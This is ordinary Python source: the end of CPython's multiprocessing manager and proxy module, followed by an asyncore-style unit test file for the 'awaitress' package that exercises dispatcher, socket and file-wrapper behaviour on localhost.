def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self, n=1):
return self._callmethod('notify', (n,))
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = time.monotonic() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - time.monotonic()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
__class_getitem__ = classmethod(types.GenericAlias)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
DictProxy._method_to_typeid_ = {
'__iter__': 'Iterator',
}
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):
public = Server.public + \
['track_segment', 'release_segment', 'list_segments']
def __init__(self, *args, **kwargs):
Server.__init__(self, *args, **kwargs)
address = self.address
# The address of Linux abstract namespaces can be bytes
if isinstance(address, bytes):
address = os.fsdecode(address)
self.shared_memory_context = \
_SharedMemoryTracker(f"shm_{address}_{getpid()}")
util.debug(f"SharedMemoryServer started by pid {getpid()}")
def create(self, c, typeid, /, *args, **kwargs):
"""Create a new distributed-shared object (not backed by a shared
memory block) and return its id to be used in a Proxy Object."""
# Unless set up as a shared proxy, don't make shared_memory_context
# a standard part of kwargs. This makes things easier for supplying
# simple functions.
if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
kwargs['shared_memory_context'] = self.shared_memory_context
return Server.create(self, c, typeid, *args, **kwargs)
def shutdown(self, c):
"Call unlink() on all tracked shared memory, terminate the Server."
self.shared_memory_context.unlink()
return Server.shutdown(self, c)
def track_segment(self, c, segment_name):
"Adds the supplied shared memory block name to Server's tracker."
self.shared_memory_context.register_segment(segment_name)
def release_segment(self, c, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the tracker instance inside the Server."""
self.shared_memory_context.destroy_segment(segment_name)
def list_segments(self, c):
"""Returns a list of names of shared memory blocks that the Server
is currently tracking."""
return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
|
test_wasyncore.py
|
from awaitress import wasyncore as asyncore
from awaitress import compat
import contextlib
import functools
import gc
import unittest
import select
import os
import socket
import sys
import time
import errno
import re
import struct
import threading
import warnings
from io import BytesIO
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
HOST = "localhost"
HOSTv4 = "127.0.0.1"
HOSTv6 = "::1"
# Filename used for testing
if os.name == "java": # pragma: no cover
# Jython disallows @ in module names
TESTFN = "$test"
else:
TESTFN = "@test"
TESTFN = "{}_{}_tmp".format(TESTFN, os.getpid())
class DummyLogger(object): # pragma: no cover
def __init__(self):
self.messages = []
def log(self, severity, message):
self.messages.append((severity, message))
class WarningsRecorder(object): # pragma: no cover
"""Convenience wrapper for the warnings list returned on
entry to the warnings.catch_warnings() context manager.
"""
def __init__(self, warnings_list):
self._warnings = warnings_list
self._last = 0
@property
def warnings(self):
return self._warnings[self._last :]
def reset(self):
self._last = len(self._warnings)
def _filterwarnings(filters, quiet=False): # pragma: no cover
"""Catch the warnings, then check if all the expected
warnings have been raised and re-raise unexpected warnings.
If 'quiet' is True, only re-raise the unexpected warnings.
"""
# Clear the warning registry of the calling module
# in order to re-raise the warnings.
frame = sys._getframe(2)
registry = frame.f_globals.get("__warningregistry__")
if registry:
registry.clear()
with warnings.catch_warnings(record=True) as w:
# Set filter "always" to record all warnings. Because
# test_warnings swap the module, we need to look up in
# the sys.modules dictionary.
sys.modules["warnings"].simplefilter("always")
yield WarningsRecorder(w)
# Filter the recorded warnings
reraise = list(w)
missing = []
for msg, cat in filters:
seen = False
for w in reraise[:]:
warning = w.message
# Filter out the matching messages
if re.match(msg, str(warning), re.I) and issubclass(warning.__class__, cat):
seen = True
reraise.remove(w)
if not seen and not quiet:
# This filter caught nothing
missing.append((msg, cat.__name__))
if reraise:
raise AssertionError("unhandled warning %s" % reraise[0])
if missing:
raise AssertionError("filter (%r, %s) did not catch any warning" % missing[0])
@contextlib.contextmanager
def check_warnings(*filters, **kwargs): # pragma: no cover
"""Context manager to silence warnings.
Accept 2-tuples as positional arguments:
("message regexp", WarningCategory)
Optional argument:
- if 'quiet' is True, it does not fail if a filter catches nothing
(default True without argument,
default False if some filters are defined)
Without argument, it defaults to:
check_warnings(("", Warning), quiet=True)
"""
quiet = kwargs.get("quiet")
if not filters:
filters = (("", Warning),)
# Preserve backward compatibility
if quiet is None:
quiet = True
return _filterwarnings(filters, quiet)
def gc_collect(): # pragma: no cover
"""Force as many objects as possible to be collected.
In non-CPython implementations of Python, this is needed because timely
deallocation is not guaranteed by the garbage collector. (Even in CPython
this can be the case in case of reference cycles.) This means that __del__
methods may be called later than expected and weakrefs may remain alive for
longer than expected. This function tries its best to force all garbage
objects to disappear.
"""
gc.collect()
if sys.platform.startswith("java"):
time.sleep(0.1)
gc.collect()
gc.collect()
def threading_setup(): # pragma: no cover
return (compat.thread._count(), None)
def threading_cleanup(*original_values): # pragma: no cover
global environment_altered
_MAX_COUNT = 100
for count in range(_MAX_COUNT):
values = (compat.thread._count(), None)
if values == original_values:
break
if not count:
# Display a warning at the first iteration
environment_altered = True
sys.stderr.write(
"Warning -- threading_cleanup() failed to cleanup "
"%s threads" % (values[0] - original_values[0])
)
sys.stderr.flush()
values = None
time.sleep(0.01)
gc_collect()
def reap_threads(func): # pragma: no cover
"""Use this function when threads are being used. This will
ensure that the threads are cleaned up even when the test fails.
"""
@functools.wraps(func)
def decorator(*args):
key = threading_setup()
try:
return func(*args)
finally:
threading_cleanup(*key)
return decorator
def join_thread(thread, timeout=30.0): # pragma: no cover
"""Join a thread. Raise an AssertionError if the thread is still alive
after timeout seconds.
"""
thread.join(timeout)
if thread.is_alive():
msg = "failed to join the thread in %.1f seconds" % timeout
raise AssertionError(msg)
def bind_port(sock, host=HOST): # pragma: no cover
"""Bind the socket to a free port and return the port number. Relies on
ephemeral ports in order to ensure we are using an unbound port. This is
important as many tests may be running simultaneously, especially in a
buildbot environment. This method raises an exception if the sock.family
is AF_INET and sock.type is SOCK_STREAM, *and* the socket has SO_REUSEADDR
or SO_REUSEPORT set on it. Tests should *never* set these socket options
for TCP/IP sockets. The only case for setting these options is testing
multicasting via multiple UDP sockets.
Additionally, if the SO_EXCLUSIVEADDRUSE socket option is available (i.e.
on Windows), it will be set on the socket. This will prevent anyone else
from bind()'ing to our host/port for the duration of the test.
"""
if sock.family == socket.AF_INET and sock.type == socket.SOCK_STREAM:
if hasattr(socket, "SO_REUSEADDR"):
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR) == 1:
raise RuntimeError(
"tests should never set the SO_REUSEADDR "
"socket option on TCP/IP sockets!"
)
if hasattr(socket, "SO_REUSEPORT"):
try:
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 1:
raise RuntimeError(
"tests should never set the SO_REUSEPORT "
"socket option on TCP/IP sockets!"
)
except OSError:
# Python's socket module was compiled using modern headers
# thus defining SO_REUSEPORT but this process is running
# under an older kernel that does not support SO_REUSEPORT.
pass
if hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
return port
@contextlib.contextmanager
def closewrapper(sock): # pragma: no cover
try:
yield sock
finally:
sock.close()
class dummysocket: # pragma: no cover
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
def setblocking(self, yesno):
self.isblocking = yesno
def getpeername(self):
return "peername"
class dummychannel: # pragma: no cover
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy: # pragma: no cover
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv): # pragma no cover
try:
serv.listen(0)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b"\n", b""))
if b"\n" in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_unix_socket(sock, addr): # pragma: no cover
"""Bind a unix socket, raising SkipTest if PermissionError is raised."""
assert sock.family == socket.AF_UNIX
try:
sock.bind(addr)
except PermissionError:
sock.close()
raise unittest.SkipTest("cannot bind AF_UNIX sockets")
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
unlink(addr)
bind_unix_socket(sock, addr)
else:
sock.bind(addr)
if sys.platform.startswith("win"): # pragma: no cover
def _waitfor(func, pathname, waitall=False):
# Perform the operation
func(pathname)
# Now setup the wait loop
if waitall:
dirname = pathname
else:
dirname, name = os.path.split(pathname)
dirname = dirname or "."
# Check for `pathname` to be removed from the filesystem.
# The exponential backoff of the timeout amounts to a total
# of ~1 second after which the deletion is probably an error
# anyway.
# Testing on an i7@4.3GHz shows that usually only 1 iteration is
# required when contention occurs.
timeout = 0.001
while timeout < 1.0:
# Note we are only testing for the existence of the file(s) in
# the contents of the directory regardless of any security or
# access rights. If we have made it this far, we have sufficient
# permissions to do that much using Python's equivalent of the
# Windows API FindFirstFile.
# Other Windows APIs can fail or give incorrect results when
# dealing with files that are pending deletion.
L = os.listdir(dirname)
if not (L if waitall else name in L):
return
# Increase the timeout and try again
time.sleep(timeout)
timeout *= 2
warnings.warn(
"tests may fail, delete still pending for " + pathname,
RuntimeWarning,
stacklevel=4,
)
def _unlink(filename):
_waitfor(os.unlink, filename)
else:
_unlink = os.unlink
def unlink(filename):
try:
_unlink(filename)
except OSError:
pass
def _is_ipv6_enabled(): # pragma: no cover
"""Check whether IPv6 is enabled on this host."""
if compat.HAS_IPV6:
sock = None
try:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.bind(("::1", 0))
return True
except socket.error:
pass
finally:
if sock:
sock.close()
return False
IPV6_ENABLED = _is_ipv6_enabled()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, "poll"), "select.poll required")
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ("read", "expt", "write", "closed", "error_handled")
expected = (
(select.POLLIN, "read"),
(select.POLLPRI, "expt"),
(select.POLLOUT, "write"),
(select.POLLERR, "closed"),
(select.POLLHUP, "closed"),
(select.POLLNVAL, "closed"),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
# def handle_error(self):
# self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr == expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], "test_wasyncore.py")
self.assertEqual(function, "test_compact_traceback")
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, "[%s|%s|%s]" % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), "<awaitress.wasyncore.dispatcher at %#x>" % id(d))
def test_log_info(self):
import logging
inst = asyncore.dispatcher(map={})
logger = DummyLogger()
inst.logger = logger
inst.log_info("message", "warning")
self.assertEqual(logger.messages, [(logging.WARN, "message")])
def test_log(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.log("message")
self.assertEqual(logger.messages, [(logging.DEBUG, "message")])
def test_unhandled(self):
import logging
inst = asyncore.dispatcher()
logger = DummyLogger()
inst.logger = logger
inst.handle_expt()
inst.handle_read()
inst.handle_write()
inst.handle_connect()
expected = [
(logging.WARN, "unhandled incoming priority event"),
(logging.WARN, "unhandled read event"),
(logging.WARN, "unhandled write event"),
(logging.WARN, "unhandled connect event"),
]
self.assertEqual(logger.messages, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, "strerror"):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send): # pragma: no cover
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b"\n")
n = 1000
while d.out_buffer and n > 0: # pragma: no cover
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data * 2)
finally:
join_thread(t, timeout=TIMEOUT)
@unittest.skipUnless(
hasattr(asyncore, "file_wrapper"), "asyncore.file_wrapper required"
)
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(TESTFN, "wb") as file:
file.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(TESTFN, "rb") as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(
hasattr(asyncore, "file_dispatcher"), "asyncore.file_dispatcher required"
)
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
got_warning = False
while got_warning is False:
# we try until we get the outcome we want because this
# test is not deterministic (gc_collect() may not
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
try:
with check_warnings(("", compat.ResourceWarning)):
f = None
gc_collect()
except AssertionError: # pragma: no cover
pass
else:
got_warning = True
def test_close_twice(self):
fd = os.open(TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher): # pragma: no cover
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self): # pragma: no cover
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5): # pragma: no cover
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b"x" * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b"\0" * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self): # pragma: no cover
# needs to exist for MacOS testing
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(
sys.platform.startswith("sunos"), "OOB support is broken on Solaris"
)
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll: # pragma: no cover
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(compat.tobytes(chr(244)), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else: # pragma: no cover
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
